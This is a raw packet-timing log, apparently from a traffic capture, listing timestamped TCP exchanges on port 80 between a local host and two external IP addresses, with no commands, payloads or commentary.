                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917834044 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917850018 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917865038 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917881012 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917891026 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917897940 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917912006 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917916059 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917942047 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917942047 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.917974949 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918034077 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918049097 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918065071 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918077946 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918096066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918132067 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918132067 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918179035 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918195009 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918210030 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918225050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918235064 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918235064 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918275118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918275118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918436050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918451071 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918466091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918473959 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918481112 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918486118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918488979 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918498993 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918514013 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918560028 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918590069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918798923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918812990 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918828964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918843985 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918848038 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918859959 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918874979 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918875933 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918909073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918909073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918941975 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918982983 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.918997049 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919014931 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919023037 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919037104 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919064999 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919078112 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919091940 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919095039 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919111967 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919128895 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919141054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919141054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919141054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919143915 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919162035 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919177055 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919190884 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919193983 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919212103 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919213057 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919238091 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919238091 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919295073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919581890 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919599056 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919641018 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919641018 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919692993 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919718027 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919732094 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919735909 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919760942 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919770956 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919770956 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919778109 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919795036 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919801950 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919811010 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919826984 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919828892 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919828892 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919843912 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919853926 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919861078 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919868946 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919878006 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919893980 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919897079 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919897079 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919910908 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919919014 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919926882 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919949055 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919949055 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.919970989 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920140982 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920156956 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920171976 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920195103 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920195103 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920217037 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920217991 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920233011 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920247078 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920273066 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920273066 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920293093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920294046 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920326948 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920334101 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920348883 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920375109 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920423031 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920424938 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920439005 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920458078 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920470953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920506001 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920517921 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920519114 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920519114 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920574903 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920599937 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920608997 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920617104 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920624018 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920639038 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920653105 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920667887 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920681953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920681953 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920700073 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920707941 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920716047 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920732975 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920742035 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920742035 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920742035 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920749903 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920764923 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920767069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920779943 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920784950 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920784950 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920795918 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920825958 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.920825958 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921288013 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921303988 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921319008 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921334982 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921344995 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921350002 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921365976 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921381950 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921387911 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921387911 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921397924 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921413898 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921423912 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921423912 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921427965 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921443939 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921443939 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921443939 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921458960 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921474934 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921480894 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921490908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921505928 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921519995 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921519995 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921546936 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921546936 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921626091 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.921662092 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.924953938 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.924992085 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925008059 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925029993 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925054073 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925086975 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925102949 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925123930 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925138950 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925153971 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925158024 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925158024 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925179958 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925246000 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925309896 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925326109 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925339937 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925355911 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925370932 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925384045 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925384045 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925385952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925422907 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925422907 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925491095 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925527096 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925539017 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925556898 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925573111 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925591946 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925591946 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925632000 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925715923 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925740957 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925755978 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925770998 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925777912 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925818920 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925818920 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925858974 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925945997 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925961018 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.925976992 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926001072 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926001072 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926021099 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926064968 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926080942 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926096916 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926135063 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926135063 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926377058 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926402092 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926422119 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926460028 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926460028 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926460028 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926512957 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926543951 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926559925 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926564932 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926575899 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926594973 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926594973 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926632881 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926683903 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926698923 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926713943 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926729918 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926733971 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926733971 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926764965 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926764965 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926851034 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926866055 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926881075 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926897049 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926903963 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926903963 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926913977 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926928043 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926934004 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926934004 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926944017 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926959991 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926961899 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926961899 CEST5898180192.168.2.585.28.47.70
